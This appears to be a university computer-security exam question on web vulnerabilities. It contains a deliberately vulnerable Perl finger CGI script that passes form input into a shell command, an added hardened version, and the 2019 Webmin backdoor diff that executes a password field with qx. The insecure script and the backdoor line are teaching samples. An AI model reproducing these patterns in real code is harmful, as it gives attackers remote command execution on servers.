2. Figure 1 on page 4 shows a Perl web CGI script along with a form to invoke it. The script displays information about a user using the Unix finger program. It could be used, for example, in a web hosting environment with a Virtual Private Server, where several users may be permitted to log in to the system and work on different web sites. An example invocation gives output like this:
Finger User
Login name: bod Real name: Bod Idley
On since Feb 19 23:37:16 on pts/7 from domain237.btinternet.com
42 seconds Idle Time
(a) The developer of the script has followed an FAQ entry given by the web hosting provider which states:
Put “use CGI::Carp qw(fatalsToBrowser);” into the second line of your script. This will make perl print the error instead of the “500 Internal Server Error” page, and will allow you to find out where your script is breaking. [Excerpt from https://www.123-reg.co.uk/support/hosting/debugging-your-perl-scripts/]
i. Explain the reasoning behind this recommendation and why adding the extra line might constitute a security vulnerability. [2 marks]
ii. Exploiting this vulnerability, what might an attacker be able to do? [2 marks]
iii. Explain carefully some additional advice you would propose to be added to this FAQ entry. [2 marks]
(b) Unfortunately, the code contains a second, more serious vulnerability.
i. Identify and explain the critical vulnerability in the code, giving an example exploit and its result. [3 marks]
ii. Give a fix for the vulnerability you identified, which does not cause errors in the script execution or the client browser. (Hint: you might use the Perl regular expression match test, written “<str> =~ <regexp>”. Syntax doesn’t need to be perfect; code showing the right intention will gain full marks.) [3 marks]
(c) The developer realises the script may reveal information about more users than wanted; it would be better to offer a drop-down list using a form with <select>...<option>... to choose from users bod, flo, and barley. Explain a (secure) way to do this. [4 marks]
(d) Considering how a hosting provider such as 123 Reg can minimise risks associated with vulnerable web sites they host, give two examples of risks affecting the hosting provider and corresponding mitigations.
#!/usr/bin/perl
# finger.cgi - finger CGI script using Perl5 CGI module

use CGI;
use CGI::Carp qw(fatalsToBrowser);   # fatal errors are reported in the HTTP response
$q = new CGI;

# display HTML header
print $q->header,
      $q->start_html('Finger User'),
      $q->h1('Finger User');

# get name of user and display finger information
# (the submitted value is interpolated into a shell command line)
$user = $q->param("user");
print "<pre>";
print `/usr/bin/finger -sh $user`;

# display HTML footer
print "</pre>";
print $q->end_html;
exit(0);
<html><head><title>Finger User</title></head>
<body><h1>Finger User</h1>
<form method=post action="finger.cgi">
<b>Username to finger:</b> <input type=text name=user value="">
<p><input type=submit value="Finger User">
</form>
</body>
</html>
Figure 1: The Perl CGI script finger.cgi and a web form invoking it
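For comparison with Figure 1, the following is an added hardened variant of the script (not part of the exam paper or of any hosting provider's code). It assumes the same CGI.pm module and finger binary, keeps the three user names from part (c) as the only accepted values, validates the parameter before it reaches any command, and runs finger without a shell.

```perl
#!/usr/bin/perl
# hardened_finger.cgi - added example, not the exam's finger.cgi
use strict;
use warnings;
use CGI;
# No CGI::Carp fatalsToBrowser: fatal errors go to the server's error
# log (STDERR) instead of being sent back in the HTTP response.

my $q = CGI->new;

# Fixed set of accounts that may be fingered (the users named in part (c)).
my %allowed = map { $_ => 1 } qw(bod flo barley);

print $q->header('text/html; charset=UTF-8'),
      $q->start_html('Finger User'),
      $q->h1('Finger User');

my $user = $q->param('user');
$user = '' unless defined $user;

# Validate before anything is executed: a short login of the expected
# shape, and one that is actually in the allowed list.
if ($user =~ /\A[a-z][a-z0-9]{0,15}\z/ && $allowed{$user}) {
    # List-form open: the program and its arguments are passed directly
    # to execve, so no shell ever interprets the contents of $user.
    if (open(my $fh, '-|', '/usr/bin/finger', '-sh', $user)) {
        local $/;                       # slurp all of finger's output
        my $out = <$fh>;
        close $fh;
        # finger output includes fields (real name, terminal, host) that
        # other parties control, so HTML-escape it before printing.
        print '<pre>', CGI::escapeHTML($out // ''), '</pre>';
    } else {
        print $q->p('Could not run finger.');
    }
} else {
    # Generic message; the rejected input is not echoed into the page.
    print $q->p('Unknown user.');
}

# Drop-down list so the form itself only offers the permitted accounts.
# The server-side check above still applies, since a request need not
# come from this form at all.
print $q->start_form(-method => 'POST', -action => 'finger.cgi'),
      $q->popup_menu(-name => 'user', -values => [sort keys %allowed]),
      $q->submit(-value => 'Finger User'),
      $q->end_form,
      $q->end_html;
```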
(e) Webmin is a web-based administration tool for Unix systems.
In August 2019, year-old backdoors were revealed in Webmin’s password_change.cgi script. Surreptitious changes were found on the build server used to make official Sourceforge releases (master GitHub sources were not affected).
One modification was:
< $enc eq $wuser->{’pass’} || &pass_error($text{’password_eold’});
---
> $enc eq $wuser->{’pass’} || &pass_error($text{’password_eold’},qx/$in{’old’}/);
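Review bot: the extra argument added to `&pass_error`, `qx/$in{’old’}/`, runs the request’s `old` form field as an OS command at the point where the old password has just failed to match; reporting a wrong password never requires executing anything, so the only change this line can make is to run attacker-supplied input. The line should be rejected, and since the master Git sources do not contain it, the build server’s working tree should be compared against the repository to find how the discrepancy was introduced.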
(the Perl qx operator executes an OS command, returning its output).
i. Speculate how an attacker with knowledge of the backdoor could gain root access to a server running a vulnerable version of Webmin. [3 marks]
ii. Explain how a backdoor such as this might have arisen, and what measures could be taken to avoid it.